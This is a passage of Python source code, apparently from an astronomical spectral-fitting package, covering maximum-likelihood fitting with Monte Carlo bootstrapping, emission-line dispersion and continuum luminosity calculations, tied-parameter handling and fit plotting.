clum_dict["AGN_FRAC_4000"] = interp_agn(4000.0)/interp_tot(4000.0)
if (c=="HOST_FRAC_7000"):
clum_dict["HOST_FRAC_7000"] = interp_host(7000.0)/interp_tot(7000.0)
if (c=="AGN_FRAC_7000"):
clum_dict["AGN_FRAC_7000"] = interp_agn(7000.0)/interp_tot(7000.0)
return clum_dict
##################################################################################
def remove_stray_lines(line_profile):
line_profile[line_profile<0] = 0
max_idx = np.where(line_profile==np.max(line_profile))[0][0]
# print(max_idx)
#
left_bad = [i for i in np.arange(max_idx,-1,-1) if line_profile[i]>0]
# print(left_bad)
left_bad_idx = [max_idx-np.where(np.abs(np.diff(left_bad))>1)[0]-1][0]
# print(left_bad_idx)
if len(left_bad_idx)>0:
l0 = left_bad_idx[0]
line_profile[range(0,l0+1,1)]= 0
#
right_bad = [i for i in np.arange(max_idx,len(line_profile),1) if line_profile[i]>0]
right_bad_idx = [max_idx+np.where(np.abs(np.diff(right_bad))>1)[0]+1][0]
if len(right_bad_idx)>0:
r0 = right_bad_idx[0]
line_profile[range(r0,len(line_profile),1)]= 0
# print(right_bad_idx)
#
return line_profile
def calc_max_like_dispersions(comp_dict, line_list, combined_line_list, lam_gal, noise, velscale):
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [i for i in line_list]
#
disp_dict = {}
fwhm_dict = {}
vint_dict = {}
#
interp_ftn = interp1d(lam_gal,np.arange(len(lam_gal))*velscale,bounds_error=False)
# Loop through lines
for line in lines:
# Calculate velocity scale centered on line
vel = np.arange(len(lam_gal))*velscale - interp_ftn(line_list[line]["center"])
full_profile = comp_dict[line]
# Remove stray lines
full_profile = remove_stray_lines(full_profile)
#
# Normalized line profile
norm_profile = full_profile/np.sum(full_profile)
# Calculate integrated velocity in pixels units
v_int = simps(vel*norm_profile,vel)/simps(norm_profile,vel)
# Calculate integrated dispersion and correct for instrumental dispersion
d_int = np.sqrt(simps(vel**2*norm_profile,vel)/simps(norm_profile,vel) - (v_int**2))
d_int = np.sqrt(d_int**2 - (line_list[line]["fwhm_res_kms"]/2.3548)**2)
#
if ~np.isfinite(d_int): d_int = 0.0
if ~np.isfinite(v_int): v_int = 0.0
disp_dict[line+"_DISP"] = d_int
vint_dict[line+"_VINT"] = v_int
if line in combined_line_list:
comb_fwhm = combined_fwhm(lam_gal,comp_dict[line],line_list[line]["fwhm_res_kms"],velscale)
fwhm_dict[line+"_FWHM"] = comb_fwhm
#
return disp_dict, fwhm_dict, vint_dict
#### Maximum Likelihood Fitting ##################################################
def max_likelihood(param_dict,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
z,
cosmology,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type='init',
fit_stat="RCHI2",
output_model=False,
test_outflows=False,
n_basinhop=5,
max_like_niter=10,
verbose=True):
"""
This function performs an initial maximum likelihood estimation to acquire robust
initial parameters. It performs the monte carlo bootstrapping for both
testing outflows and fit for final initial parameters for emcee.
"""
param_names = [key for key in param_dict ]
params = [param_dict[key]['init'] for key in param_dict ]
bounds = [param_dict[key]['plim'] for key in param_dict ]
lb, ub = zip(*bounds)
param_bounds = op.Bounds(lb,ub,keep_feasible=True)
# Generate constraints
# cons = []
# def lambda_gen(con):
# con = copy.deepcopy(con)
# return lambda p: p[param_names.index(con[0])]-p[param_names.index(con[1])]
# cons = [{"type":"ineq","fun": lambda_gen(con)} for con in soft_cons]
def lambda_gen(con):
return lambda p: ne.evaluate(con[0],local_dict = {param_names[i]:p[i] for i in range(len(p))}).item()-ne.evaluate(con[1],local_dict = {param_names[i]:p[i] for i in range(len(p))}).item()
cons = [{"type":"ineq","fun": lambda_gen(copy.deepcopy(con))} for con in soft_cons]
#
# Perform maximum likelihood estimation for initial guesses of MCMC fit
if verbose:
print('\n Performing max. likelihood fitting.')
print('\n Using Basin-hopping algorithm to estimate parameters. niter_success = %d' % (n_basinhop))
# Start a timer
start_time = time.time()
# Negative log-likelihood (to minimize the negative maximum)
nll = lambda *args: -lnlike(*args)
# Perform global optimization using basin-hopping algorithm (superior to minimize(), but slower)
# We will use minimize() for the monte carlo bootstrap iterations.
result = op.basinhopping(func = nll,
x0 = params,
# T = 0.0,
stepsize=1.0,
niter = 100, # Max # of iterations before stopping
minimizer_kwargs = {'args':(
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model),
'method':'SLSQP', 'bounds':param_bounds, 'constraints':cons, "options":{"disp":False}},
disp=verbose,
niter_success=n_basinhop, # Max # of successive search iterations
)
#
# Get elapsed time
elap_time = (time.time() - start_time)
par_best = result['x']
fit_type = 'init'
output_model = True
comp_dict = fit_model(par_best,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# if fit_stat=="RCHI2":
# return {p:result['x'][i] for i,p in enumerate(param_names)},comp_dict
#### Maximum Likelihood Bootstrapping #################################################################
# Construct random normally-distributed noise
# How we do the monte carlo bootstrapping (i.e., the proper way):
# (1) The 1-sigma uncertainty (spectral "noise") from inverse variance of the SDSS spectra is
# the pixel-to-pixel variation in the spectrum when rows of pixels are added to form the final 1-d spectrum.
# This is always an underestimate of the true noise in the spectrum.
# (2) The residual noise from a fit, taken to be the median absolute deviation of the residuals from a fit. This
# is always greater than the "noise" from (1), but closer to the actual value of the noise across the fitting
# region.
# We add (1) and (2) in quadrature to simulate the noise at /every/ pixel in the fitting region.
# Note: the SDSS noise is likely underestimated, but this is the best we can do.
mcnoise = np.array(noise)
# Storage dictionaries for all calculated paramters at each iteration
mcpars = {k:np.empty(max_like_niter+1) for k in param_names}
# flux_dict
flux_names = [key+"_FLUX" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mcflux = {k:np.empty(max_like_niter+1) for k in flux_names}
# lum dict
lum_names = [key+"_LUM" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mclum = {k:np.empty(max_like_niter+1) for k in lum_names}
# eqwidth dict
# line_names = [key+"_EW" for key in {**line_list, **combined_line_list}]
line_names = [key+"_EW" for key in comp_dict if key not in ["DATA","WAVE","MODEL","NOISE","RESID","POWER","HOST_GALAXY","BALMER_CONT"]]
mceqw = {k:np.empty(max_like_niter+1) for k in line_names}
# integrated dispersion & velocity dicts
line_names = [key+"_DISP" for key in {**line_list, **combined_line_list}]
mcdisp = {k:np.empty(max_like_niter+1) for k in line_names}
line_names = [key+"_FWHM" for key in combined_line_list]
mcfwhm = {k:np.empty(max_like_niter+1) for k in line_names}
line_names = [key+"_VINT" for key in {**line_list, **combined_line_list}]
mcvint = {k:np.empty(max_like_niter+1) for k in line_names}
# component dictionary
mccomps = {k:np.empty((max_like_niter+1,len(comp_dict[k]))) for k in comp_dict}
# log-likelihood array
mcLL = np.empty(max_like_niter+1)
# Monochromatic continuum luminosities array
clum = []
if (lam_gal[0]<1350) & (lam_gal[-1]>1350):
clum.append("L_CONT_AGN_1350")
clum.append("L_CONT_HOST_1350")
clum.append("L_CONT_TOT_1350")
if (lam_gal[0]<3000) & (lam_gal[-1]>3000):
clum.append("L_CONT_AGN_3000")
clum.append("L_CONT_HOST_3000")
clum.append("L_CONT_TOT_3000")
if (lam_gal[0]<4000) & (lam_gal[-1]>4000):
clum.append("HOST_FRAC_4000")
clum.append("AGN_FRAC_4000")
if (lam_gal[0]<5100) & (lam_gal[-1]>5100):
clum.append("L_CONT_AGN_5100")
clum.append("L_CONT_HOST_5100")
clum.append("L_CONT_TOT_5100")
if (lam_gal[0]<7000) & (lam_gal[-1]>7000):
clum.append("HOST_FRAC_7000")
clum.append("AGN_FRAC_7000")
mccont = {k:np.empty(max_like_niter+1) for k in clum}
# Calculate fluxes
flux_dict = calc_max_like_flux(comp_dict, lam_gal)
# Calculate luminosities
lum_dict = calc_max_like_lum(flux_dict, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate equivalent widths
eqwidth_dict = calc_max_like_eqwidth(comp_dict, {**line_list, **combined_line_list}, lam_gal, noise, velscale)
# Calculate continuum luminosities
clum_dict = calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate integrated line dispersions
disp_dict, fwhm_dict, vint_dict = calc_max_like_dispersions(comp_dict, {**line_list, **combined_line_list}, combined_line_list, lam_gal, noise, velscale)
# Add first iteration to arrays
# Add to mcpars dict
for i,key in enumerate(param_names):
mcpars[key][0] = result['x'][i]
# Add to mcflux dict
for key in flux_dict:
mcflux[key][0] = flux_dict[key]
# Add to mclum dict
for key in lum_dict:
mclum[key][0] = lum_dict[key]
# Add to mceqw dict
if eqwidth_dict is not None:
# Add to mceqw dict
for key in eqwidth_dict:
mceqw[key][0] = eqwidth_dict[key]
# Add to mcdisp dict
for key in disp_dict:
mcdisp[key][0] = disp_dict[key]
for key in fwhm_dict:
mcfwhm[key][0] = fwhm_dict[key]
for key in vint_dict:
mcvint[key][0] = vint_dict[key]
# Add components to mccomps
for key in comp_dict:
mccomps[key][0,:] = comp_dict[key]
# Add log-likelihood to mcLL
mcLL[0] = result["fun"]
# Add continuum luminosities
for key in clum_dict:
mccont[key][0] = clum_dict[key]
if (max_like_niter>0):
if verbose:
print( '\n Performing Monte Carlo bootstrapping...')
for n in range(1,max_like_niter+1,1):
# Generate a simulated galaxy spectrum with noise added at each pixel
mcgal = np.random.normal(galaxy,mcnoise)
# Get rid of any infs or nan if there are none; this will cause scipy.optimize to fail
mcgal[~np.isfinite(mcgal)] = np.median(mcgal)
fit_type = 'init'
output_model = False
# if (cons is not None):
if 1:
nll = lambda *args: -lnlike(*args)
resultmc = op.minimize(fun = nll,
x0 = result['x'],
args=(param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
mcgal, # use mcgal
mcnoise, # use mcnoise
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model),
method='SLSQP',
bounds = param_bounds,
constraints=cons,
options={'maxiter':2500,'disp': False})
mcLL[n] = resultmc["fun"] # add best fit function values to mcLL
# Get best-fit model components to calculate fluxes and equivalent widths
output_model = True
comp_dict = fit_model(resultmc["x"],
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Calculate fluxes
flux_dict = calc_max_like_flux(comp_dict, lam_gal)
# Calculate luminosities
lum_dict = calc_max_like_lum(flux_dict, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate equivalent widths
eqwidth_dict = calc_max_like_eqwidth(comp_dict, {**line_list, **combined_line_list}, lam_gal, noise, velscale)
# Calculate continuum luminosities
clum_dict = calc_max_like_cont_lum(clum, comp_dict, lam_gal, z, H0=cosmology["H0"], Om0=cosmology["Om0"])
# Calculate integrated line dispersions
disp_dict, fwhm_dict, vint_dict = calc_max_like_dispersions(comp_dict, {**line_list, **combined_line_list}, combined_line_list, lam_gal, noise, velscale)
# Add to mc storage dictionaries
# Add to mcpars dict
for i,key in enumerate(param_names):
mcpars[key][n] = resultmc['x'][i]
# Add to mcflux dict
for key in flux_dict:
mcflux[key][n] = flux_dict[key]
# Add to mclum dict
for key in lum_dict:
mclum[key][n] = lum_dict[key]
# Add to mceqw dict
if eqwidth_dict is not None:
# Add to mceqw dict
for key in eqwidth_dict:
mceqw[key][n] = eqwidth_dict[key]
# Add components to mccomps
for key in comp_dict:
mccomps[key][n,:] = comp_dict[key]
# Add continuum luminosities
for key in clum_dict:
mccont[key][n] = clum_dict[key]
# Add to mcdisp dict
for key in disp_dict:
mcdisp[key][n] = disp_dict[key]
for key in fwhm_dict:
mcfwhm[key][n] = fwhm_dict[key]
for key in vint_dict:
mcvint[key][n] = vint_dict[key]
if verbose:
print(' Completed %d of %d iterations.' % (n,max_like_niter) )
# Iterate through every parameter to determine if the fit is "good" (more than 1-sigma away from bounds)
# if not, then add 1 to that parameter flag value
pdict = {} # parameter dictionary for all fitted parameters (free parameters, fluxes, luminosities, and equivalent widths)
best_param_dict = {} # For getting the best fit model components
# Add parameter names to pdict
for i,key in enumerate(param_names):
param_flags = 0
mc_med = np.median(mcpars[key])
mc_std = np.std(mcpars[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (mc_med-mc_std <= bounds[i][0]):
param_flags += 1
if (mc_med+mc_std >= bounds[i][1]):
param_flags += 1
if (mc_std==0):
param_flags += 1
pdict[param_names[i]] = {'med':mc_med,'std':mc_std,'flag':param_flags}
best_param_dict[param_names[i]] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add fluxes to pdict
for key in mcflux:
param_flags = 0
mc_med = np.median(mcflux[key])
mc_std = np.std(mcflux[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-5] in line_list):
if (line_list[key[:-5]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-5]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-5] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add luminosities to pdict
for key in mclum:
param_flags = 0
mc_med = np.median(mclum[key])
mc_std = np.std(mclum[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-4] in line_list):
if (line_list[key[:-4]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-4]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-4] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add equivalent widths to pdict
if eqwidth_dict is not None:
for key in mceqw:
param_flags = 0
mc_med = np.median(mceqw[key])
mc_std = np.std(mceqw[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (key[:-3] in line_list):
if (line_list[key[:-3]]["line_type"]=="abs") & (mc_med+mc_std >= 0.0):
param_flags += 1
elif (line_list[key[:-3]]["line_type"]!="abs") & (mc_med-mc_std <= 0.0):
param_flags += 1
elif ((key[:-3] not in line_list) & (mc_med-mc_std <= 0.0)) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add dispersions to pdict
for key in mcdisp:
param_flags = 0
mc_med = np.median(mcdisp[key])
mc_std = np.std(mcdisp[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add FWHMs to pdict
for key in mcfwhm:
param_flags = 0
mc_med = np.median(mcfwhm[key])
mc_std = np.std(mcfwhm[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add velocities to pdict
for key in mcvint:
param_flags = 0
mc_med = np.median(mcvint[key])
mc_std = np.std(mcvint[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add continuum luminosities to pdict
for key in mccont:
param_flags = 0
mc_med = np.median(mccont[key])
mc_std = np.std(mccont[key])
if ~np.isfinite(mc_med): mc_med = 0
if ~np.isfinite(mc_std): mc_std = 0
if (mc_med-mc_std <= 0.0) or (mc_std==0):
param_flags += 1
pdict[key] = {'med':mc_med,'std':mc_std,'flag':param_flags}
# Add log-likelihood function values
mc_med = np.median(mcLL)
mc_std = np.std(mcLL)
pdict["LOG_LIKE"] = {'med':mc_med,'std':mc_std,'flag':0}
#
# Add tied parameters explicitly to final parameter dictionary
pdict = max_like_add_tied_parameters(pdict,line_list)
#
# Calculate some fit quality parameters which will be added to the dictionary
# These will be appended to result_dict and need to be in the same format {"med": , "std", "flag":}
fit_quality_dict = fit_quality_pars(best_param_dict,line_list,combined_line_list,comp_dict,fit_mask,fit_type="max_like",fit_stat=fit_stat)
pdict = {**pdict,**fit_quality_dict}
if (test_outflows==True):
return pdict, mccomps, mcLL
# Get best-fit components for maximum likelihood plot
output_model = True
comp_dict = fit_model([best_param_dict[key]['med'] for key in best_param_dict],best_param_dict.keys(),
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
# Plot results of maximum likelihood fit
sigma_resid, sigma_noise = max_like_plot(lam_gal,comp_dict,line_list,
[best_param_dict[key]['med'] for key in best_param_dict],
best_param_dict.keys(),fit_mask,run_dir)
#
if verbose:
print('\n Maximum Likelihood Best-fit Parameters:')
print('--------------------------------------------------------------------------------------')
print('\n{0:<30}{1:<30}{2:<30}{3:<30}'.format('Parameter', 'Best-fit Value', '+/- 1-sigma','Flag'))
print('--------------------------------------------------------------------------------------')
# Sort into arrays
pname = []
med = []
std = []
flag = []
for key in pdict:
pname.append(key)
med.append(pdict[key]['med'])
std.append(pdict[key]['std'])
flag.append(pdict[key]['flag'])
i_sort = np.argsort(pname)
pname = np.array(pname)[i_sort]
med = np.array(med)[i_sort]
std = np.array(std)[i_sort]
flag = np.array(flag)[i_sort]
if verbose:
for i in range(0,len(pname),1):
print('{0:<30}{1:<30.6f}{2:<30.6f}{3:<30}'.format(pname[i], med[i], std[i], flag[i] ))
if verbose:
print('{0:<30}{1:<30.6f}{2:<30}{3:<30}'.format('NOISE_STD', sigma_noise, ' ',' '))
print('{0:<30}{1:<30.6f}{2:<30}{3:<30}'.format('RESID_STD', sigma_resid, ' ',' '))
print('--------------------------------------------------------------------------------------')
# Write to log
write_log((pdict,sigma_noise,sigma_resid),'max_like_fit',run_dir)
#
return pdict, comp_dict
#### Add Tied Parameters Explicitly ##############################################
def max_like_add_tied_parameters(pdict,line_list):
# for key in pdict:
# print(key,pdict[key])
# Make dictionaries for pdict
param_names = [key for key in pdict]
med_dict = {key:pdict[key]["med"] for key in pdict}
std_dict = {key:pdict[key]["std"] for key in pdict}
flag_dict = {key:pdict[key]["flag"] for key in pdict}
# print()
for line in line_list:
for par in line_list[line]:
if (line_list[line][par]!="free") & (par in ["amp","fwhm","voff","shape","h3","h4","h5","h6","h7","h8","h9","h10"]):
expr = line_list[line][par] # expression to evaluate
expr_vars = [i for i in param_names if i in expr]
med = ne.evaluate(expr,local_dict = med_dict).item()
std = np.sqrt(np.sum(np.array([std_dict[i] for i in expr_vars],dtype=float)**2))
flag = np.sum([flag_dict[i] for i in expr_vars])
pdict[line+"_"+par.upper()] = {"med":med, "std":std, "flag":flag}
# for key in pdict:
# print(key,pdict[key])
return pdict
def add_tied_parameters(pdict,line_list):
# for key in pdict:
# print(key,pdict[key])
# Make dictionaries for pdict
param_names = [key for key in pdict]
# init_dict = {key:pdict[key]["init"] for key in pdict}
# plim_dict = {key:pdict[key]["plim"] for key in pdict}
chain_dict = {key:pdict[key]["chain"] for key in pdict}
par_best_dict = {key:pdict[key]["par_best"] for key in pdict}
ci_68_low_dict = {key:pdict[key]["ci_68_low"] for key in pdict}
ci_68_upp_dict = {key:pdict[key]["ci_68_upp"] for key in pdict}
ci_95_low_dict = {key:pdict[key]["ci_95_low"] for key in pdict}
ci_95_upp_dict = {key:pdict[key]["ci_95_upp"] for key in pdict}
mean_dict = {key:pdict[key]["mean"] for key in pdict}
std_dev_dict = {key:pdict[key]["std_dev"] for key in pdict}
median_dict = {key:pdict[key]["median"] for key in pdict}
med_abs_dev_dict = {key:pdict[key]["med_abs_dev"] for key in pdict}
flat_samp_dict = {key:pdict[key]["flat_chain"] for key in pdict}
flag_dict = {key:pdict[key]["flag"] for key in pdict}
# print()
for line in line_list:
for par in line_list[line]:
if (line_list[line][par]!="free") & (par in ["amp","fwhm","voff","shape","h3","h4","h5","h6","h7","h8","h9","h10"]):
expr = line_list[line][par] # expression to evaluate
expr_vars = [i for i in param_names if i in expr]
init = pdict[expr_vars[0]]["init"]
plim = pdict[expr_vars[0]]["plim"]
chain = ne.evaluate(line_list[line][par],local_dict = chain_dict)
par_best = ne.evaluate(line_list[line][par],local_dict = par_best_dict).item()
ci_68_low = np.sqrt(np.sum(np.array([ci_68_low_dict[i] for i in expr_vars],dtype=float)**2))
ci_68_upp = np.sqrt(np.sum(np.array([ci_68_upp_dict[i] for i in expr_vars],dtype=float)**2))
ci_95_low = np.sqrt(np.sum(np.array([ci_95_low_dict[i] for i in expr_vars],dtype=float)**2))
ci_95_upp = np.sqrt(np.sum(np.array([ci_95_upp_dict[i] for i in expr_vars],dtype=float)**2))
mean = np.sqrt(np.sum(np.array([mean_dict[i] for i in expr_vars],dtype=float)**2))
std_dev = np.sqrt(np.sum(np.array([std_dev_dict[i] for i in expr_vars],dtype=float)**2))
median = np.sqrt(np.sum(np.array([median_dict[i] for i in expr_vars],dtype=float)**2))
med_abs_dev = np.sqrt(np.sum(np.array([med_abs_dev_dict[i] for i in expr_vars],dtype=float)**2))
flag = np.sum([flag_dict[i] for i in expr_vars])
pdict[line+"_"+par.upper()] = {"init":init, "plim":plim, "chain":chain,
"par_best":par_best, "ci_68_low":ci_68_low, "ci_68_upp":ci_68_upp,
"ci_95_low":ci_95_low, "ci_95_upp":ci_95_upp,
"mean": mean, "std_dev":std_dev,
"median":median, "med_abs_dev":med_abs_dev,
"flag":flag}
# for key in pdict:
# print(key,pdict[key])
return pdict
##################################################################################
#### Max Likelihood Plot #########################################################
def max_like_plot(lam_gal,comp_dict,line_list,params,param_names,fit_mask,run_dir):
def poly_label(kind):
if kind=="ppoly":
order = len([p for p in param_names if p.startswith("PPOLY_") ])-1
if kind=="apoly":
order = len([p for p in param_names if p.startswith("APOLY_")])-1
if kind=="mpoly":
order = len([p for p in param_names if p.startswith("MPOLY_")])-1
#
ordinal = lambda n: "%d%s" % (n,"tsnrhtdd"[(n//10%10!=1)*(n%10<4)*n%10::4])
return ordinal(order)
def calc_new_center(center,voff):
"""
Calculated new center shifted
by some velocity offset.
"""
c = 299792.458 # speed of light (km/s)
new_center = (voff*center)/c + center
return new_center
# Put params in dictionary
p = dict(zip(param_names,params))
# Maximum Likelihood plot
fig = plt.figure(figsize=(14,6))
gs = gridspec.GridSpec(4, 1)
gs.update(wspace=0.0, hspace=0.0) # set the spacing between axes.
ax1 = plt.subplot(gs[0:3,0])
ax2 = plt.subplot(gs[3,0])
for key in comp_dict:
if (key=='DATA'):
ax1.plot(comp_dict['WAVE'],comp_dict['DATA'],linewidth=0.5,color='white',label='Data',zorder=0)
elif (key=='MODEL'):
ax1.plot(lam_gal,comp_dict[key], color='xkcd:bright red', linewidth=1.0, label='Model', zorder=15)
elif (key=='HOST_GALAXY'):
ax1.plot(comp_dict['WAVE'], comp_dict['HOST_GALAXY'], color='xkcd:bright green', linewidth=0.5, linestyle='-', label='Host/Stellar')
elif (key=='POWER'):
ax1.plot(comp_dict['WAVE'], comp_dict['POWER'], color='xkcd:red' , linewidth=0.5, linestyle='--', label='AGN Cont.')
elif (key=='PPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['PPOLY'], color='xkcd:magenta' , linewidth=0.5, linestyle='-', label='%s-order Poly.' % (poly_label("ppoly")))
elif (key=='APOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['APOLY'], color='xkcd:bright purple' , linewidth=0.5, linestyle='-', label='%s-order Add. Poly.' % (poly_label("apoly")))
elif (key=='MPOLY'):
ax1.plot(comp_dict['WAVE'], comp_dict['MPOLY'], color='xkcd:lavender' , linewidth=0.5, linestyle='-', label='%s-order Mult. Poly.' % (poly_label("mpoly")))
elif (key in ['NA_OPT_FEII_TEMPLATE','BR_OPT_FEII_TEMPLATE']):
ax1.plot(comp_dict['WAVE'], comp_dict['NA_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='Narrow FeII')
ax1.plot(comp_dict['WAVE'], comp_dict['BR_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='Broad FeII')
elif (key in ['F_OPT_FEII_TEMPLATE','S_OPT_FEII_TEMPLATE','G_OPT_FEII_TEMPLATE','Z_OPT_FEII_TEMPLATE']):
if key=='F_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['F_OPT_FEII_TEMPLATE'], color='xkcd:yellow', linewidth=0.5, linestyle='-' , label='F-transition FeII')
elif key=='S_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['S_OPT_FEII_TEMPLATE'], color='xkcd:mustard', linewidth=0.5, linestyle='-' , label='S-transition FeII')
elif key=='G_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['G_OPT_FEII_TEMPLATE'], color='xkcd:orange', linewidth=0.5, linestyle='-' , label='G-transition FeII')
elif key=='Z_OPT_FEII_TEMPLATE':
ax1.plot(comp_dict['WAVE'], comp_dict['Z_OPT_FEII_TEMPLATE'], color='xkcd:rust', linewidth=0.5, linestyle='-' , label='Z-transition FeII')
elif (key=='UV_IRON_TEMPLATE'):
ax1.plot(comp_dict['WAVE'], comp_dict['UV_IRON_TEMPLATE'], color='xkcd:bright purple', linewidth=0.5, linestyle='-' , label='UV Iron' )
elif (key=='BALMER_CONT'):
ax1.plot(comp_dict['WAVE'], comp_dict['BALMER_CONT'], color='xkcd:bright green', linewidth=0.5, linestyle='--' , label='Balmer Continuum' )
# Plot emission lines by cross-referencing comp_dict with line_list
if (key in line_list):
if (line_list[key]["line_type"]=="na"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:cerulean', linewidth=0.5, linestyle='-', label='Narrow/Core Comp.')
if (line_list[key]["line_type"]=="br"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright teal', linewidth=0.5, linestyle='-', label='Broad Comp.')
if (line_list[key]["line_type"]=="out"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:bright pink', linewidth=0.5, linestyle='-', label='Outflow Comp.')
if (line_list[key]["line_type"]=="abs"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:pastel red', linewidth=0.5, linestyle='-', label='Absorption Comp.')
if (line_list[key]["line_type"]=="user"):
ax1.plot(comp_dict['WAVE'], comp_dict[key], color='xkcd:electric lime', linewidth=0.5, linestyle='-', label='Other')
# Plot bad pixels
ibad = [i for i in range(len(lam_gal)) if i not in fit_mask]
if (len(ibad)>0):# and (len(ibad[0])>1):
bad_wave = [(lam_gal[m],lam_gal[m+1]) for m in ibad if ((m+1)<len(lam_gal))]
ax1.axvspan(bad_wave[0][0],bad_wave[0][0],alpha=0.25,color='xkcd:lime green',label="bad pixels")
for i in bad_wave[1:]:
ax1.axvspan(i[0],i[0],alpha=0.25,color='xkcd:lime green')
ax1.set_xticklabels([])
ax1.set_xlim(np.min(lam_gal)-10,np.max(lam_gal)+10)
# ax1.set_ylim(-0.5*np.median(comp_dict['MODEL']),np.max([comp_dict['DATA'],comp_dict['MODEL']]))
ax1.set_ylabel(r'$f_\lambda$ ($10^{-17}$ erg cm$^{-2}$ s$^{-1}$ $\mathrm{\AA}^{-1}$)',fontsize=10)
# Residuals
sigma_resid = np.nanstd(comp_dict['DATA'][fit_mask]-comp_dict['MODEL'][fit_mask])
sigma_noise = np.median(comp_dict['NOISE'][fit_mask])
ax2.plot(lam_gal,(comp_dict['NOISE']*3.0),linewidth=0.5,color="xkcd:bright orange",label='$\sigma_{\mathrm{noise}}=%0.4f$' % (sigma_noise))
ax2.plot(lam_gal,(comp_dict['RESID']*3.0),linewidth=0.5,color="white",label='$\sigma_{\mathrm{resid}}=%0.4f$' % (sigma_resid))
ax1.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
ax2.axhline(0.0,linewidth=1.0,color='white',linestyle='--')
# Axes limits
ax_low = np.nanmin([ax1.get_ylim()[0],ax2.get_ylim()[0]])
ax_upp = np.nanmax(comp_dict['DATA'][fit_mask])+(3.0 * np.nanmedian(comp_dict['NOISE'][fit_mask])) #np.nanmax([ax1.get_ylim()[1], ax2.get_ylim()[1]])
